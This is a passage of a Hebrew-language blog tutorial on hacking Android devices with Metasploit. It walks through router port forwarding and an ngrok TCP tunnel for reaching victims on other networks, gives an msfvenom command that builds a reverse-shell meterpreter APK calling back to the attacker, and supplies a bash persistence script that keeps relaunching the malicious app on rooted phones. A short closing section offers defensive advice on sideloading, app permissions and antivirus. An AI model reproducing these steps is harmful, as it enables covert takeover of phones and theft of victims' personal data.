כעת היכנסו להגדרות הfirewall של הנתב שלכם והגדירו את הפורט 4444 כפורט פתוח, עבור כתובת הip הפנימית שלכם, אותה ניתן לראות גם-כן כמובן בעזרת הפקודה ipconfig.

אני אציג את הפעולה בממשק של אחד הנתבים בהם אני משתמש, נתב d-link פשוט. ראשית-כל, נלחץ על לשונית הadvanced:

בלשונית זו נבחר באפשרות port forwarding:

נלחץ על add ע"מ להוסיף חוק חדש:

כעת נבחר באפשרות cusom service ובה נזין את שם החוק. בשדה server ip address נזין את כתובת הip של מכונת הלינוקס ובשדות הפורטים נזין את פורט 4444. כך אנו נותנים הוראה לנתב לאפשר לכתובת הip 192.168.150.20 לגשת לפורט 4444, הפורט איתו מתקשר הpayload הזדוני. לאחר סיום ההגדרה, נלחץ על apply/save.

נראה שהחוק אכן הוגדר בהצלחה:

כעת נחזור למכונת הkali שלנו וניצור את הpayload הזדוני, שהפעם יתקשר עם כתובת הip הציבורית שלנו המתקשרת עם האינטרנט ולא עם כתובת הip המקומית, אליה יכול לפנות באופן ישיר רק מחשב ברשת המקומי שלנו. את כתובת הip הציבורית שלכם תוכלו לראות כאן.

msfvenom -p android/meterpreter/reverse_tcp LHOST=<your puclic ip address> LPORT=4444 R> payload_wan.apk

כעת נפעיל את המאזין בmetasploit בדיוק כמו שהפעלנו קודם לכן (עם כתובת הip המקומית שלנו), נחדיר את הpayload הזדוני למכשיר היעד כאשר נוודא שהרשת בה אנו משתמשים שונה מהרשת בה נמצא המחשב התוקף, ואכן – קיבלנו גישה ליעד, למרות שאנחנו ברשתות שונות.

2. שימוש בngrok

ngrok זהו כלי שימושי מאד שמאפשר לנו לפתוח שרת אינטרנט על תיקיות במחשב המקומי שלנו, בלחיצת כפתור. כלומר, ngrok יארח את השרת המקומי שלנו בתת דומיין שלו ובכך יאפשר לנו לתקשר עם רשת האינטרנט. במסגרת המגוון הרחב של הדברים שניתן לבצע בngrok, ישנה אפשרות גם לבצע מנהור TCP בין המכשיר שלנו לכתובת באינטרנט על פורט ספציפי, כך שנוכל להאזין בכתובת המקומית שלנו לכל פנייה שתתבצע לכתובת האינטרנט, לפורט הספציפי. בדיוק מה שאנו צריכים עבור יצירת הpayload

ראשית-כל, נוריד את ngrok מהאינטרנט למכונת הkali שלנו, תוכלו להגיע לאתר ngrok כאן:

נפתח את הדחיסה של הקובץ בעזרת הפקודה unzip:

כעת נצטרך להירשם באתר של ngrok ולכתוב פקודה שתכיל את האסימון שנקבל, ע"מ שנוכל להשתמש בשירות. נחזור לאתר, נלחץ על sign-up ונזין את הפרטים:

לאחר מכן, נזין את הפקודה הבאה (החליפו את <your_auth_token>) במפתח שיופיע לכם בעמוד החשבון שלכם באתר ngrok:

<ngrok authtoken <your_auth_token/.

כעת נפתח את מנהור הTCP על פורט 4444:

ngrok tcp 4444/.

אם ביצענו הכל כמו שצריך, ייפתח לנו חלון שיציג לנו את כתובת האתר והפורט שיפנו לפורט 444 בכתובת המקומית שלנו:

כעת נבצע את הפקודה host/nslookup/ping לכתובת הurl, ע"מ לדעת מהי כתובת הip של האתר:

ניקח את כתובת הip הזו ונשתמש בה עבור יצירת payload חדש, עם הפרטים הללו (כתובת הip של האתר והפורט שהוצג לנו. את הפורט כאמור נחלון לראות בחלון הngrok שנפתח לנו):

כעת נפעיל מאזין בmetasploit שיפנה לכתובת המקומית שלנו ולפורט 4444, נוריד את קובץ הapk הזדוני במכשיר היעד, ואכן – גם הפעם, החיבור נוצר.

אם כן, יצרנו את אפליקציה זדונית שמיועדת עבור מכשירים שחברים ברשת שלנו בעזרת msfvenom, חתמנו עליה ושינינו את השם והאייקון שלה, כפי שיופיעו למשתמש. לאחר-מכן, למדנו 2 טכניקות כיצד ניתן לבצע פעולה זהה, לא רק למכשירים שחברים איתנו באותה הרשת, אלא לכל מכשיר שמחובר לאינטרנט. כעת נותר לנו להבין: כיצד נוכל להשאיר את הsession עם המכשיר הנתקף מחובר לאורך זמן. כפי שוודאי שמתם-לב, הsession שנוצר עם המכשיר הנתקף לאחר התקנת האפליקציה נשמר מספר דקות בודדות בממוצע (במסגרתם אפשר להוציא כמעט את כל המידע ממכשיר היעד ולחולל המון נזק כמובן). בשביל להחזיר אותו, אנו צריכים שהיעד ילחץ שוב על האפליקציה, פעולה שלכאורה יהיה מאד קשה לגרום לו לבצע. בשורות הבאות נלמד כיצד, במכשירים שרצים תחת הרשאות root, אנו יכולים לגרום למכשיר היעד לשמור על החיבור איתנו ובמקרה של ניתוק, לחדש את התקשורת באופן אוטומטי, גם ללא אף פעולה מצד הנתקף.

6. שמירת הsession לאורך זמן במכשירים בעלי הרשאת root

נתחיל עם נושא שמירת הsession. כפי שכבר הסברנו במדריך הmeterpreter, ע"מ שנוכל לבצע העלאת קבצים למכשיר היעד, אנו צריכים להשתמש בפקודה upload. מה שנצטרך לעשות כעת, הוא לכתוב script בbash שיגרום למכשיר היעד ל"ללחוץ" על האפליקציה הזדונית בכל 10 שניות, כך שגם אם הsession יתנתק, הוא מיד יחזור בחזרה. את הסקריפט הזדוני נחדיר למכשיר היעד בעזרת upload מיד עם פתיחת הsession הראשון ובכך נבטיח חיבור יציב עם המכשיר. חשוב לציין שע"מ סקריפט זה יעבוד, מכשיר היעד צריך להיות תחת הרשאות root, 'מכשיר פרוץ' בסלנג. ע"מ לבדוק האם מכשיר היעד שלנו הוא כזה, נוכל להשתמש בפקודה check_root, כפי שראינו במדריך הmeterpreter.

נפתח את vi בעזרת הפקודה sudo vi android_script.sh:

נזין את הscript הבא ונשמור אותו, מיד אסביר כיצד הוא פועל:

bin/bash/!#

:while True
    
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
    
sleep 10
    
done

הסבר לסקריפט: אנו מתחילים את הscript עם הפתיח הסטנדרטי של קבצי bash, לאחר מכן אנו יוצרים לולאה אין סופית עם while ובלולאה זו אנו מגדירים הוראה שuser 0 (הroot) יצור חיבור בין המכשיר לאפליקציה הזדונית. במקרה של נפילת החבילה, תהיה הפסקה של 10 שניות (sleep 10) והחיבור יחזור.

כעת, כאשר מכשיר היעד יתקין את האפליקציה בפעם הראשונה ויצור לנו session, נעלה את הקובץ למכשיר היעד, לתיקייה sdcard, התיקייה המרכזית במכשיר.

נבצע cd לתיקייה sdcard, לשם תתבצע ההעלאה של הסקריפט:

כעת נבצע את ההעלאה בפועל, עם:

upload /home/eliya/android_script.sh

אם תקבלו פלט זהה לפלט שלפניכם, הפעולה בוצעה בהצלחה:

כעת, הsession יפעל ללא הפסקה וגם במקרה של ניתוק (לדוגמא, הpayload תוכנן לרשת המקומית ויצאנו מהרשת המקומית), תוך עשר שניות מרגע החזרה לרשת המקומית, תבוצע אלינו התחברות מחדש.

זהו, עד כאן לפרק התקיפה במדריך של השבוע הנוכחי. השתדלתי שהחומר יהיה ברור ומפורט ככל שניתן וכזה שייתן מענה לכל תקלה אפשרית, מקווה שאכן השגתי את המטרה. למעשה, לאחר שתבינו היטב את החומר שהצגתי במדריך הנוכחי, יוותרו לנו עוד שני נושאים מרכזיים להכיר ע"מ להקיף את נושא הפריצה לandorid בעזרת metasploit ברמה הבסיסית. שני הנושאים הם: א'. כיצד נוכל להחדיר את הpayload הזדוני לקובץ apk של אפליקציה קיימת במקום ליצור אפליקציה ריקה מתוכן משלנו? קחו לדוגמא אפליקציות שלא זמינות בישראל ויש כאלה שמורידים את קובץ הapk שלהם, אותם אנשים לא יודעים שייתכן מאד שהקובץ שהם מתקינים הוא למעשה אפליקציה זדונית ששואבת להם את כל המידע. ב'. כיצד נוכל להתגבר על התראות האנטי וירוס השונות, כלפי אותם מכשירים שכן מחזיקים באנטי וירוס? יש לציין כי אני מתלבט האם יש עניין לכתוב מדריך נוסף שיתייחס לנושאים הללו, שכן אני לא יודע כמה ביקוש יהיה בקהילת הסייבר למדריך שיירד לרוזלוציות כאלה שמצריכות כבר היכרות יותר משמעותית עם קבצי האפליקציה ועם הנדסה לאחור, אחרי המדריך המפורט שקראתם היום. אם נושא זה מעניין אתכם, כתבו לי ואשתדל לכתוב על כך בשבועות הקרובים.

רגע לפני סיום פרק התקיפה חשוב לי שתדעו שאת מרבית הפעולות שראיתם במדריך זה ניתן לבצע בעזרת כלים אוטומטיים שהדבר היחיד שהם יבקשו ממכם זה להזין את השם שאנו רוצים לתת לאפליקציה, את הכתובת ip והפורט ואת הicon, כאשר כל השאר יתבצע אוטומטית ע"י הכלי מאחורי הקלעים. אבל המטרה של הבלוג הזה היא לא ללמד לפרוץ, אלא ללמד להיות איש מקצוע בתחום האבטחה וכלים אוטומטיים לא יעזרו לנו במימוש השאיפה הזו. כלים אוטומטיים הם נהדרים אחרי שכבר יודעים כיצד הדברים פועלים ובכך אנו חוסכים לעצמנו זמן, אבל להשתמש בהם מבלי להבין ולהכיר את הפעולות בפועל, בעיניי זו טעות. תארו לכם שהכלי האוטומטי שנשתמש בו יפסיק לעבוד מתישהו? (וזה קורה כל הזמן…). אם הדבר היחיד שאנו יודעים לעשות זה להשתמש בכלים אוטומטיים, אז סיימנו את הקריירה. אם הידע שלנו הוא גם כיצד לבצע את הדברים בפועל, אז נוכל להמשיך ולבצע את הפעולות שלנו ואולי גם לפתח בעצמנו את הכלי האוטומטי החדש.

איך מתגוננים?

א'. לעולם, אבל לעולם, אל תתקינו קובץ apk למכשיר שלכם שלא דרך חנות google. את האפליקציות תורידו אך ורק מחנות הgoogle play ולא משנה מי שולח לכם את הקובץ הapk. המון פעמים יעברו לידכם קבצי apk של אפליקציות שלא זמינות בישראל, תעשו לעצמכם טובה, אל תורידו את הקבצים האלה.

החלטתם להוריד אפליקציה מחנות הgoogle play? א'. אל תורידו אפליקציות עם פחות מ100,000 הורדות / אפליקציות מדורגות עם מקור ברור וידוע. גם כשאתם מורידים אפליקציות ידועות, שימו לב להרשאות שמבקשים ממכם. אם פנקס רשימות מבקש ממכם הרשאה לאנשי קשר / תוכנת עריכת תמונות מבקשת ממכם הרשאות לאנשי קשר, זה אמור לעלות לכם נורה אדומה. תוכנת עריכת התמונות לא צריכה את האנשי קשר שלכם בשביל לערוך תמונות ואם היא מבקשת אותה ממכם, כנראה שהיא לא מתספקת בלערוך תמונות.

ב'. הקפידו להתקין אנטי וירוס מהימן ואיכותי במכשיר שלכם. הדבר האחרון שאתם יכולים לעשות זה לסמוך על אבטחת המכשיר הסטנדרטית. זה לדוגמא מה שחשב המכשיר שלי על האפליקציה הזדונית שיצרנו FastRan לאחר שהוא ביצע לה סריקה (שימו לב לסימון הבטוח):

ישנם שורה של אנטי וירוסים חינמיים לטלפון האישי. אני ממליץ לרכוש דווקא את גרסאות הpro בתשלום (פעמים רבות תוכלו לקבל אותם לאחר הסכמה לפרסומות). ההמלצה שלי היא לבחור את Norton Mobile Security שנחשב לאמין ומצוין ובעיניי הוא האנטי-וירוס הטוב ביותר עבור מערכת Android. אם תנסו להוריד את האפליקציה הזדונית כשNorton מותקן במכשיר שלכם, תקבלו אזהרה מפורשת שמדובר בקובץ זדוני. אם תנסו להוריד את הקובץ כשהאנטי וירוס שלכם הוא אנטי וירוס חינמי כמו AVG AntiVirus Free או Avast Mobile Security שגם נחשבים למצוינים, תקבלו רק אזהרה שהקובץ הזה "עלול להיות לא רצוי". כך לפחות בסריקות שאני ערכתי. לכן, ההמלצה שלי היא לבחור בו. Norton לא רק מספק לכם הגנה מפני אפליקציות זדוניות, יש בו המון פיצ'רים נוספים שיאפשרו לכם לשלוט באבטחת הטלפון שלכם ולהרגיש בטוחים. רק אם ההשקעה הכספית הזו ממש קשה לכם, אפשר גם להסתפק בAVG או Avast, אבל קחו בחשבון שבכל פעם שיופיע לכם שהקובץ "עלול להיות לא רצוי" בהם או בכל תוכנת אנטי וירוס אחרת, אל תבינו את זה כ"קובץ שעלול להיות לא רצוי", אלא כקובץ לא רצוי, ולא רק לא רצוי – גם מסוכן.

כמו-כן אציין שגם אם רכשתם את Norton, כדאי שיהיה לידו את AVG א Avast החינמיים שיעסקו גם בסריקת קבצים, לדוגמא, קובץ הapk הזדוני לפני התקנתו (פעולה שNorton פחות מתעסק פה).